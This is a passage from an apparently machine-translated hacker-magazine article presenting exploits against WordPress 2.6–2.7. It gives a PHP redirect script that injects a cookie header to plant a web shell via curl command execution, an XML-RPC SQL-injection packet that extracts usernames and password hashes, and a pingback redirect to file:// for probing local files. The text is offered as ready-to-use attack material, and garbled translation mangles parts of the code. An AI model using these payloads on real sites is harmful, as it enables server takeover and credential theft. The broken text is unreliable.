be a low risk vulnerability for WordPress users, we wanted to get an update out immediately.Also, when comparing the code of Snoopy WordPress <= 2.6.2:</p><p> exec (escapeshellcmd ($ this-> curl_path"-D \" $ headerfile\""$ cmdline_params"\" "$ safer_URI."\""),$ results, $ return);</p><p>- Snoopy code of WordPress <= 2.6.5:</p><p> exec ($ this-> curl_path"-k-D \" $ headerfile\""$ cmdline_params"\" "escapeshellcmd ($ URI)."\"", $ results, $ return);</p><p>The second code - it is an official patch developers Snoopy, which closes the previous code exec (but does not close a new one)Funny, is not it? Why patch something that was so badpatched? The answers to these questions, we hardly know.Such negligence of developers revealed to me the way to a remarkable vulnerabilityBut first things first.2Script. code-exec.php should contain the following code:</p><p> <? Php</p><p> header ('set-cookie: `echo \' <? php system ($ _GET [aa]);?>\'> ./wp-content /test.php` = cooka');</p><p> header ("Location: https: // /? feed = rss2");</p><p> ?></p><p>After making these simple actions to the appropriate blog/Wp-content /test.php flood shellWe now consider, where and why this is possible:1Only on WordPress 2.6.3, 2.6.5 (2.6.4 was not simple, and in 2.7 Snoopy is almost not used) with an open registration required for editing RSS-feeds;2Only on systems where the curl is installed in /usr /local /bin /curl (the most common system in such a configuration file - FreeBSD), since this is the notorious hard-coded path in/Wp-includes /class-snoopy.php, plus a binary Kurla verify the existence and enforceability:</p><p> if (! $ this-> curl_path)</p><p> return false;</p><p> if (function_exists ("is_executable"))</p><p> if (! is_executable ($ this-> curl_path))</p><p> return false;</p><p>3This works because Snoopy supports forwarding (up to 5 times by default)During it he can set cookies and other hedery to send server-side scriptAs you can see from psevdopatcha over filtration hederov transfer them to the exec () No one, of course, not thought.4This works not only cookies, but in many other titlesFor example, we will be able to pass arbitrary code in the header HOST follows:</p><p> <? Php</p><p> header ("Location: https: //lal` my evil command `com");</p><p> ?></p><p> Sly uploadThe next step - a great SQL-injection, the observed companion Elect more than a year ago in all WordPress versions 2.2.x-2.3.xTo use it, user must have the rights «upload_files» (ie, the role of Editor).Consider the source code interface for remote publishing to WordPress - xmlrpc.php (yes, in this file was found the largest number of SQL-injection engine)The interface of the present method metaWeblog.newMediaObject, which is a direct reference to the function mw_newMediaObjectDraw a small reversing:1/Xmlrpc.php</p><p> function mw_newMediaObject ($ args)</p><p> {</p><p> ...</p><p> $ Blog_ID = (int) $ args [0];</p><p> $ User_login = $ wpdb-> escape ($ args[1]);</p><p> $ User_pass = $ wpdb-> escape ($ args[2]);</p><p> $ Data = $ args[3];</p><p> ...</p><p> $ Name = sanitize_file_name ($ data ['name']);</p></td></tr></table><tr><td>$ Type = $ data ['type'];</p><p> $ Bits = $ data ['bits'];</p><p> ...</p><p> $ Attachment = array (</p><p> 'Post_title' => $ name,</p><p> 'Post_content' =>'',</p><p> 'Post_type' =>'attachment',</p><p> 'Post_parent' => $ post_id,</p><p> 'Post_mime_type' => $ type,</p><p> 'Guid' => $ upload ['url']</p><p> );</p><p> //Save the data</p><p> $ Id = wp_insert_attachment ($ attachment, $ upload ['file'], $ post_id);</p><p> ...</p><p> }</p><p>2/Wp-includes /post.php</p><p> function wp_insert_attachment ($ object, $ file = false, $ parent = 0)</p><p> {</p><p> ...</p><p> $ bject = wp_parse_args ($ object, $ defaults);</p><p> extract ($ object, EXTR_SKIP);</p><p> ...</p><p> if ($ update) {</p><p> $ Wpdb-> query (</p><p> "UPDATE $ wpdb-> posts SET</p><p> post_author = '$ post_author',</p><p> post_date = '$ post_date',</p><p> post_date_gmt = '$ post_date_gmt',</p><p> post_content = '$ post_content',</p><p> post_content_filtered = '$ post_content_filtered',</p><p> post_title = '$ post_title',</p><p> post_excerpt = '$ post_excerpt',</p><p> post_status = '$ post_status',</p><p> post_type = '$ post_type',</p><p> comment_status = '$ comment_status',</p><p> ping_status = '$ ping_status',</p><p> post_password = '$ post_password',</p><p> post_name = '$ post_name',</p><p> to_ping = '$ to_ping',</p><p> pinged = '$ pinged',</p><p> post_modified = '"current_time (' mysql')."',</p><p> post_modified_gmt = '"current_time ('mysql ', 1 )."',</p><p> post_parent = '$ post_parent',</p><p> menu_order = '$ menu_order',</p><p> post_mime_type = '$ post_mime_type',</p><p> guid = '$ guid'</p><p> WHERE ID = $ post_ID ");</p><p> }</p><p> ...</p><p> }</p><p> Tracing the entire path of the variable $ type, you'll find that no one cared about her filter before inserting in SQL-query:)Therefore, we can easily proinzhektit UPDATE query, for example, sending a package to the POST-xmlrpc.php:</p><p> <? Xml version = "1.0" encoding = "UTF-7"?> <methodCall></p><p> <methodName> wp.uploadFile </methodName></p><p> <params></p><p> <param> <value> <string> 1 </string> </value> </param></p><p> <param> <value> <string> [IMYA_AVTORA] </string> </value> </param></p><p> <param> <value> <string> [PAROL_AVTORA] </string> </value> </param></p><p> <param> <struct></p><p> <member></p><p> <name> name </name></p><p> <value> xxx.gif </value></p><p> </Member></p><p> <member></p> <p> <name> type </name></p><p> <value> gif ', (select concat (user_login ,':', user_pass) from wp_users limit a ))/*</value></p><p> </Member></p><p> <member>< /p><p> <name> bits </name></p><p> <value> HELLO WORLD!</value></p><p> </Member></p><p> </Struct></p><p > </Param></p><p> <param> <value> <string> 77</string> </value> </param></p><p> </Params> </methodCall></p><p>After sending the packet to the blog of the victim hurry to go to the admin panel: Manage => UploadsIn the «URL» in case of successful operation of the exploit you will see the hash and the password admin.Tricks with KurlovPresent to your attention yet another vulnerability WordPress (found with the help of Electa), which is to verify the existence of any file on a vulnerable blogAffects all versions of the engine, starting with 2.7.First you need to say that this is not the vulnerability of WordPress, but rather a feature curl, php-library which is just yuzaet WordPress instead gone into oblivion Snoopy.Thus, the vulnerability of Kurla is that he can read with pleasure for you not only deleted files on http, but also local with the prefix «file ://»! But as a rule, the prefixes a re checked at the entrance to another script. and it would seem, «file: //» zayuzat impossibleHowever, no one thought that curl supports forwarding through the flag «CURLOPT_FOLLOWLOCATION»That is, - substituting Kurlya quite normal http, at the output we can get a reading of arbitrary local files (for a detailed advisory of the pioneer look in the footnotes)! In Wordpress a lot of files yuzayut class/Wp-includes /http.php, but now we consider only one of the most affordable pre-auth and procedures for maintenance bugs (to find other ways in admin - your homework:)).First, consider some particularly important for the operation of the bug chunks of code in the latest version of WordPress (2.7.1):1/Wp-includes /http.php</p><p> class WP_Http_Curl {</p><p> function request ($ url, $ args = array ()) {</p><p> if (! ini_get ('safe_mode') & &! ini_get ('open_basedir'))</p><p> curl_setopt ($ handle, CURLOPT_FOLLOWLOCATION, true);</p><p>Yes! You see the same flag that is responsible for supporting a round-trip! Next omit arcane code, but I'll just say that by default (of four possible variants) as a transport http-data Wordpress chooses Kurlya:function wp_remote_get ($ url, $ args = array ()) {$ bjFetchSite = _wp_http_get_object ();return $ objFetchSite-> get ($ url, $ args);}2Features outlined above is used/Wp-includes /functions.php:function wp_remote_fopen ($ uri) {...$ Response = wp_remote_get ($ uri, $ options);...}3And finally, this same function is used already a favorite of your interface xmlrpc:function pingback_ping ($ args) {...$ Pagelinkedfrom = $ args [0];$ Pagelinkedto = $ args [1];...//Let's check the remote site$ Linea = wp_remote_fopen ($ pagelinkedfrom);...Now we have everything you need to write an exploit - to which we now proceed.Was there a video?As you already figured out, we will act through the mechanism of pingbekov, about which I have repeatedly talked in previous issues] [For work, we need two files available on httpFor example, as follows:andAssuming that our blog - /blog, and that the test stand is the Wind, will begin work on the necessary files:1./ping1/index.php</p><p> <? Php</p><p> header ("<title> Exploit </title> <a href="/ping2/?p=1#/blog"> Curl </a>");</p><p> header ("Location: file: ///c:\boot.ini", 302);</p><p> ?></p><p>2./ping2/index.phpPing2In this example, the first file will be able to ping the second, thanks to yet another flaw WordPressLook to the mechanism of pings xmlrpc.php://Check if the page linked to is in our site$ Pos1 = strpos ($ pagelinkedto, str_replace (array ('http://www.', 'Http://', 'https: //www.', 'Https ://'),'', get_option ( 'home')));if (! $ pos1)return new IXR_Error (0, __ ('Is there no link to us ?'));In this test does not need to ping a second site was always this blog because we can bypass the check by inserting the address of this very blogFor example, at the end of the URL after the grating.All set to check for file c:\boot.ini on the system under test.For the exploitation of this vulnerability you need only send the following POST-server package for xmlrpc:</p><p> <methodCall></p><p> <methodName> pingback.ping</methodName></p><p> <params></p><p> <param> <value> <string> /ping1/?p=2 </string> </value> </param></p><p> <param> <value> <string> /ping2/?p = [test] # /blog </string> </value></param></p><p> </Params></p><p> </MethodCall></ p><p>After sending the package you can get two responses from the server:1If the file c:\boot.ini exists, then the blog will send such a response -2If no such file exists, then wait for a response -The source URL does not exist.By the way, this way it would be quite possible to read the contents of any file system, if pingbek not reduced to a very small number of charactersSo, in a comment-pingbeke you will see only something like:[...] Server: Apache/2.2.4 (Win32) mod_ssl/2.2.4 OpenSSL/0.9.8d PHP/5.2.4 X-Powered-By: PHP/5.2.4 popa: 111 Location: file: ///c: boot.ini Content-Length: 0 Connection: closeContent-Type: text /html; [...]The contents of c:\boot.ini is somewhere under the cut:)The described method of exploitation is not uniqueIn admin area you can find other function calls wp_get_http (), and which will allow you to read files on the systemFind them - have your job.To be continued ...Well, do you still think WordPress sound engine? Do not forget: malignant kodokopateli daily along and across the torment WordPress codebaseAs the saying goes, "To be continued ...":).INFOThank Raz0r for writing code exec exploit for WordPress 2.6.x, as well as Elekt for any vulnerability.。